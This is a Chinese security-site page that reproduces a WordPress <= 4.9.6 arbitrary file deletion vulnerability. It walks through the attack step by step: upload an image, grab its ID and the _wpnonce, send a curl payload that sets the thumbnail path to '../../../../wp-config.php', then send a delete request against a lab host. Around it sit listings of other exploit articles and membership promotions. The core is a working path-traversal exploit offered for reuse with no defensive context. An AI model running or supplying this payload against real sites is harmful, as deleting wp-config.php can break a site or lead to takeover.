006-WordPress <= 4.9.6 任意文件删除漏洞

000

# WordPress <= 4.9.6 任意文件删除漏洞 ### 一、漏洞简介 利用条件L:需要进入后台 ### 二、漏洞影响 ### 三、复现过程 添加新媒体 访问`http://url/wp-admin/upload.php`,然后上传图片。 ![](/static/lingzu/images/15895250864044.png) 将$ meta ['thumb']设置为我们要删除的文件 单击我们在中上传的图像Step 2,并记住图像的ID。 ![](/static/lingzu/images/15895250942523.png) 访问`http:/url/wp-admin/post.php?post=4&action=edit._wpnonce`在页面源中查找 ![](/static/lingzu/images/15895251130489.png) 发送有效载荷: ```bash curl -v 'http://url/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=editattachment&_wpnonce=***&thumb=../../../../wp-config.php' ``` ![](/static/lingzu/images/15895251299444.png) #### 发动攻击 在页面源码中查找 _wpnonce ![](/static/lingzu/images/15895251439661.png) 发送有效载荷 ```bash curl -v 'http://9c9b.vsplate.me/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=delete&_wpnonce=***' ``` ![](/static/lingzu/images/15895251592825.png) 刷新页面 ![](/static/lingzu/images/15895251670423.png)

© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
国内漏洞库
喜欢就支持一下吧
点赞0 分享
棉花糖的头像-棉花糖会员站年费会员
会员必看手册(20250530版本)增加某会员文章搜索阅读-棉花糖会员站
会员必看手册(20250530版本)增加某会员文章搜索阅读
会员必看手册(20250530版本)增加某会员文章搜索阅读
2025年5月30日 2.8W+
mingdon 明动 burp插件0.2.6版本 本地时间校验去除版-棉花糖会员站
mingdon 明动 burp插件0.2.6版本 本地时间校验去除版
mingdon 明动 burp插件0.2.6版本 本地时间校验去除版
2025年7月3日 9779
独家!超强代码审计工具上线!免费会员等你来嫖!-棉花糖会员站
独家!超强代码审计工具上线!免费会员等你来嫖!
独家!超强代码审计工具上线!免费会员等你来嫖!
2024年12月17日 7068
技术文章投稿兑换会员规则-棉花糖会员站
技术文章投稿兑换会员规则
技术文章投稿兑换会员规则
2024年3月25日 4453
已开奖!国庆抽奖,猫咪赞助安全课程300份-棉花糖会员站
已开奖!国庆抽奖,猫咪赞助安全课程300份
已开奖!国庆抽奖,猫咪赞助安全课程300份
2024年9月29日 3167
王老师src真正的完整版(49个学生分享视频版本)-棉花糖会员站
王老师src真正的完整版(49个学生分享视频版本)
王老师src真正的完整版(49个学生分享视频版本)
2024年6月8日 3167
相关推荐
金蝶EAS autoLogin.jsp远程代码执行-棉花糖会员站
金蝶EAS autoLogin.jsp远程代码执行
金蝶EAS autoLogin.jsp远程代码执行
2025年7月4日 1596
AgentSyste代理商管理系统 login.action Struts2 远程代码执行-棉花糖会员站
AgentSyste代理商管理系统 login.action Struts2 远程代码执行
AgentSyste代理商管理系统 login.action Struts2 远程代码执行
2025年7月1日 1399
海康威视漏洞合集-棉花糖会员站
海康威视漏洞合集
海康威视漏洞合集
2024年6月1日 1318
NIPS 绿盟网络入侵防护系统敏感信息泄漏-棉花糖会员站
NIPS 绿盟网络入侵防护系统敏感信息泄漏
NIPS 绿盟网络入侵防护系统敏感信息泄漏
2025年6月24日 1197
爱数AnyShare智能内容管理平台 start_service 存在远程命令执行-棉花糖会员站
爱数AnyShare智能内容管理平台 start_service 存在远程命令执行
爱数AnyShare智能内容管理平台 start_service 存在远程命令执行
2025年7月4日 1182
泛微OA E-cology /mobile/plugin/plugin.xml 存在未授权访问-棉花糖会员站
泛微OA E-cology /mobile/plugin/plugin.xml 存在未授权访问
泛微OA E-cology /mobile/plugin/plugin.xml 存在未授权访问
2025年6月17日 1143
评论 抢沙发

请登录后发表评论

    暂无评论内容

作者
用户封面
棉花糖的头像-棉花糖会员站年费会员
大华 evo-runs/v1.0/receive RCE
Redis hyperloglog 远程代码执行漏洞(CVE-2025-32023)
PTCMS小说聚合网站系统源码+带会员收费机制
互联网暴露面收集模版.xlsx
汉王e脸通综合管理平台 addVisitDeviceAppointmentInfoTest 反序列化
汉王e脸通综合管理平台 queryAlarmEvent.do SQL注入
最近一周热门文章

1深信服运维安全管理系统 RCE

棉花糖的头像-棉花糖会员站年费会员2025年7月6日
1011

2【投稿】海鲜市场某大佬的网络安全笔记

4123414qwerqss的头像-棉花糖会员站年费会员2025年7月9日
9999942

3美特CRM存在druid未授权访问

棉花糖的头像-棉花糖会员站年费会员2025年7月6日
911

4Redis hyperloglog 远程代码执行(CVE-2025-32023)

棉花糖的头像-棉花糖会员站年费会员2025年7月8日
9999862

5杭州雄伟科技发展有限公司餐厅数字化综合管理平台存在存在绕过认证导致任意密码重置漏洞

4123414qwerqss的头像-棉花糖会员站年费会员2025年7月6日
9999776

6畅捷通TPLUS AccountClearControler SQL注入

棉花糖的头像-棉花糖会员站年费会员2025年7月7日
9999760
标签云
龙浏览器未引用的服务路径特权升级齿轮地理位置查询鼠标鼠标按钮命令注入远程鼠标远程代码执行鼠标远程代码鼠标路径遍历鼠标本地文件包含鼠标未引用的服务路径鼠标事件状态栏鼠标默认错误页面跨站点脚本默认配置远程代码执行默认管理员凭据默认的调制解调器上的密码硬件远程默认权限默认权利默认弱密码编码默认密码默认安全性硬件远程默认和弱加密